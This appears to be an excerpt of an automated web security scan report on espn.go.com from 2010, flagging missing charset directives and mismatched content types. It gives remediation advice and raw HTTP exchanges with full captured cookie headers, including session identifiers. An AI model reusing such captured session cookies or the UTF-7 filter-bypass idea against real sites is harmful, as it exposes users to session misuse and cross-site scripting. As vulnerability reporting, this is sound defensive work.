If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /mlb/format/design09/index/playerRatingsTopTen HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sun, 07 Nov 2010 06:29:02 GMT Content-Type: text/html Last-Modified: Sun, 07 Nov 2010 06:29:02 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sun, 07 Nov 2010 06:30:02 GMT Content-Length: 1762 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /mlb/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sun, 07 Nov 2010 06:30:25 GMT Content-Type: text/html Last-Modified: Sat, 06 Nov 2010 15:18:20 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 15:19:20 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
<html> <head> <script type='text/javascript'> var dom=location.hash if (dom!=''){ dom=dom.substr(1) if (dom!=1)document.domain=dom else { var adsIn=1; var f=document.cr ...[SNIP]...
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
The response contains the following Content-type statement:
Content-Type: text/html; charset=iso-8859-1
The response states that it contains HTML. However, it actually appears to contain JSON.
Request
GET /espn3/search/indexFeaturedEvents HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 06:10:21 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 06:03:54 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sun, 07 Nov 2010 06:12:14 GMT Content-Length: 2751 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
{"featuredEvents":[ {"id":"65806", "name":"#18 Arkansas vs. #19 South Carolina", "eventType":"replay", "starttime":"Sat, Nov 06, 07:00 PM", "thumbnail":"http://a.espncdn.com/espn360/images/fb/ncaaf/6 ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /mlb/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sun, 07 Nov 2010 06:30:25 GMT Content-Type: text/html Last-Modified: Sat, 06 Nov 2010 15:18:20 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 15:19:20 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7